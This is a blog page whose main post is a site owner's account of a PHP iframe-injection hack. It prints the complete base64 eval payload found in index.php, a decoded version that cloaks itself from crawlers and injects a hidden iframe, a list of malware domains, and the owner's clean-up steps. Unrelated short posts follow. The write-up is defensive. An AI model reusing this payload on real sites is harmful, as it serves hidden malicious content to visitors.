Wordress, Joomla and other sites were hacked: iFrame Injection Attack

I just found the following code in the index.php file located at root or \htdocs\ folder:

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9keGFkaXlnLmNvLnR2Lz9nbz0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ=='));

Using a base64 decoder, the code was deciphered:

error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
	array("216.239.32.0","216.239.63.255"),
	array("64.68.80.0"  ,"64.68.87.255"  ),
	array("66.102.0.0",  "66.102.15.255"),
	array("64.233.160.0","64.233.191.255"),
	array("66.249.64.0", "66.249.95.255"),
	array("72.14.192.0", "72.14.255.255"),
	array("209.85.128.0","209.85.255.255"),
	array("198.108.100.192","198.108.100.207"),
	array("173.194.0.0","173.194.255.255"),
	array("216.33.229.144","216.33.229.151"),
	array("216.33.229.160","216.33.229.167"),
	array("209.185.108.128","209.185.108.255"),
	array("216.109.75.80","216.109.75.95"),
	array("64.68.88.0","64.68.95.255"),
	array("64.68.64.64","64.68.64.127"),
	array("64.41.221.192","64.41.221.207"),
	array("74.125.0.0","74.125.255.255"),
	array("65.52.0.0","65.55.255.255"),
	array("74.6.0.0","74.6.255.255"),
	array("67.195.0.0","67.195.255.255"),
	array("72.30.0.0","72.30.255.255"),
	array("38.0.0.0","38.255.255.255")
	);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
	if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
	if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<  i fra-me ---removed code for security>';
}

Here are Recent Domains Used by the Malware: jfgjfr5jdfj.vv.cc, gdsagw3hgsrh.co.cc, jfgdhdfhsdfh.vv.cc, vfsgsh4hxfh.co.cc, ktk4gj.co.cc, gasgshshdh.co.cc, gewherhfdh.co.cc, h345jdfhfchf.co.cc, g2hsjgjgfj.co.cc, hfdhe3hjdf.co.cc, ns34jgdmhfm.co.cc, wrag23hdjsg.co.cc, ds23gfdshgfnf.co.cc, gdsg3whfshf.co.cc, hbsfhwerbxn.co.cc, hfdshwhfh3g.co.cc, gsdgwe3gfnx.co.cc, 3gshsddh.co.cc, hdh4hfdhf.co.cc, gsg3wahfh.co.cc, gsgwsgdsgg.co.cc, ktdi5ejytdjy.co.cc, hdfshtrehsht.co.cc, gdsg34gdsgf.co.cc, gsg3gsgfdsg.co.cc, gagdsgewg.co.cc, ghdsg32hgdf.co.cc, g232sgd.co.cc, fg2fsfsdvg.co.cc, hfdah4hdfhgf.co.cc, dfahwhh4hfh.co.cc, gsagddgsg.co.cc, mghmrm.co.cc, bfda3wgfdhf.co.cc, hfdsh34hdhfg.co.cc, gsdfaghw3hgsfd.co.cc, hfdahwhfdhfgdh.co.cc, hfdsah34hh.co.cc, euy0.co.cc, p6ox.co.cc, 71pp.co.cc, 2d7d.co.cc, uxqt.co.cc, f2hl.co.cc, s4gs.cz.cc, 9rk1.co.cc, gtha.co.cc, icu2.co.cc, fsfbv4gdgdg.cz.cc, v934.co.cc, ghtt5rgff.cz.cc, f9tq.cz.cc, gdfkwiksdk.cz.cc, hdfs4hwdhdf.cz.cc, psyzbq.cz.cc, sdgw3gsdg.vv.cc, 8ieq1w0.cz.cc, gs4gshshfs.vv.cc, gsdha3whfh.vv.cc, bxhbawhgsdfhzwre.vv.cc, geg3gsgdwd.cz.cc, gvonlxto1fj.cz.cc, 023uik6fj8.cz.cc, aixfbap7xo.co.cc, 1og0r6uz0hu.cz.cc, da3gwdgsdg.cz.cc, k74yq3zdgw.co.cc, utjtnw91jy.co.cc, sdfgsdfgsdf.co.cc, jd52b9rz6h.co.cc, 5jeuzfn9la.cz.cc, wgrgwozso9.co.cc, llhquzvvp0.co.cc, gwvmloqs.co.cc, oxvz.co.cc, 7ujj.co.cc, 6p58.co.cc, tapgjiuo.co.cc, y58z.co.cc, fvnv.co.cc, gmmidoet.co.cc, sa1o.co.cc, brliimuc.co.cc, bcmc.co.cc, s5t6.co.cc

First attempt, I edited the index.php and fix it! Remove the eval-line.
I reset my password and remove all ftp users.
But within two hours the index-files where hacked again.

Next attempt.
..edited the index.php, remove the eval-line.
I reset my password.
Then, I changed the file permission to 444, so any write permission won’t be allowed. Hope it will stop injecting code through backdoor script that may be existing inside my files.

Update 8 hours:
No sign of code injection attack

Lee Min Ho Wallpaper

Exercise Machines that Turn Your Sweat Into Electricity

By implementing power-producing exercise machines in this way, gyms can promote themselves as environment friendly and also lessen their electric bills. At least three start-ups in the United States are now selling equipment to retrofit aerobic machines—stationary bicycles, elliptical trainers, and steppers—into electricity-generating gear. Read More

50 Free Photography Resources

Photography is a pleasing hobby enjoyed by lots of people around the globe. It’s a very entertaining pastime, but also a very technical one. There’s a baffling range of cameras, lenses and accessories, and photographers also have to get to grips with computers and image editing software packages. It can get very perplexing, especially for newcomers to the hobby, and there always seems to be something to new to learn, even for skilled photographers.

With this in mind Smashing Magazine listed 50 free resources that will be useful to anyone involved in photography. They compiled a list of the best and most comprehensive websites that will help you get the most out of your photography equipment. You’ll find a gold mine of resources on equipment and technique, and also advice from some of the most active and well-known professional photographers.

Continue Reading ->

Korea Post 17th International Postage Stamp Design Contest

Korea Post 17th International Postage Stamp Design Contest
By: Philippine Embassy
The Embassy of the Philippines in Korea encourages all Filipinos both in Korea and in the Philippines to submit entries to the 17th International Postage Stamp Design Contest, organized by the Korea Post.
For this year’s contest, entries will be accepted from 07 July to 06 September 2011, in the theme of “Sharing Hope.” Two Grand Prize winning designs will be issued as postage stamps in 2012.

Contest Guidelines:

Theme: Sharing Hope
(Express the message that we must aid our neighbors around the world who are suffering from poverty, disease, disaster, etc.)

Eligibility:
a. Youth Category: 17 years of age and under
b. General Category : 18 years of age and over

Submission Guidelines:
a. Number of entries submitted: No limit
b. Size of design: 15cm (width) x 20cm (length) or 20cm (width) x 15cm (length)
c. On an A4-sized hardboard, the entry work should be attached on the front and the application form on the back (application forms can be downloaded from the webpage of Korea Post www.koreapost.go.kr or www.koreastamp.go.kr )
d. Only works (including computer graphics) that have not been submitted to other contests shall be accepted and the original copy must be submitted at all times.
e. There are no restrictions in the range of materials and colors used in the works, but three-dimensional works will not be accepted.
f. The design shall not incorporate postage stamp names (themes, subtitles) or the numbers representing the denomination or year of issues.
g. Application period: 07 July to 06 September 2011.
h. For the overseas part, only those works that arrived by 05 September 2011 will be eligible.
i. Address for entries:
Postage Stamps and Philately Division
Korea Post
6 Jongno, Jongno-gu
Seoul, 110-110, Republic of Korea

Prizes:

Grand Prize Winner: Youth Category- KRW 2,000,000
General Category – KRW 3,000,000

For more details on the contest, please refer to the following website:

http://www.koreapost.go.kr/eng/sub/subpage.jsp?contId=e1040214

Google+ Invitations | Try Google+

Google Plus is a real-life sharing, rethought for the web. If you want to find out more about Google+, here is a link to the demo: http://www.google.com/+/demo/

Google has invited only a small number of people to test this new project. Now the users who have joined Google+ can invite others to test it. I have also got an invitation and I still have many invites left. So I’m sharing it with all of you here, just fill out the form below:

or leave a comment below:

PS: If you are on Google +, add me on your circle Nazcar Pine | Google+